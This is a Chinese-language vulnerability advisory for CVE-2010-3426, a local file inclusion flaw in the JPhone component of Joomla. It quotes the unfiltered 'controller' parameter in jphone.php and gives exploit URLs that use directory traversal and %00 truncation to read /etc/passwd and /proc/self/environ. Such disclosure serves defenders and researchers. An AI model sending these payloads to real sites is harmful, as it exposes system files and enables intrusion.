### 0x01 漏洞简述
CVE-2010-3426
CNNVD-201009-171
发布时间 : 2010-09-16
影响版本 : 1.0 Alpha 3
官方主页 : http://www.4you-studio.com
下载链接 : http://www.joomlafrance.org/telecharger/download/Jphone/344bbad81cf491b6e5215e3f15fc3fb7.html
4You-Studio JPhone组件 'controller' 参数本地文件包含漏洞
Joomla!是一款开放源码的内容管理系统(CMS)。
Joomla!中的JPhone (com_jphone)组件1.0 Alpha 3 版本中的jphone.php文件中存在目录遍历漏洞。远程攻击者可以借助index.php文件的controller参数中的".."(点点)操作符来包含以及执行任意本地文件。
### 0x02 漏洞细节
漏洞存在于文件: /components/com_jphone/jphone.php
63-65 行
```
[63] if($controller = JRequest::getVar('controller')) {
[64]
[65] require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
```
65行中 `$controller` 参数没有过滤,导致利用 `%00` 截断即可包含本地任意文件。
利用方式如下。
```
http://site/path/index.php?option=com_jphone&controller={LFI}
{LFI}=../../../../../../../../../../etc/passwd%00
{LFI}=../../../../../../../../../../proc/self/environ%00
```
LFI填写待包含文件路径后,加 `%00` 截断。
### 0x03 参考链接
1、http://xforce.iss.net/xforce/xfdb/61723
2、http://www.securityfocus.com/bid/43147
3、http://www.exploit-db.com/exploits/14964
4、http://packetstormsecurity.org/1009-exploits/joomlajphone-lfi.txt
暂无评论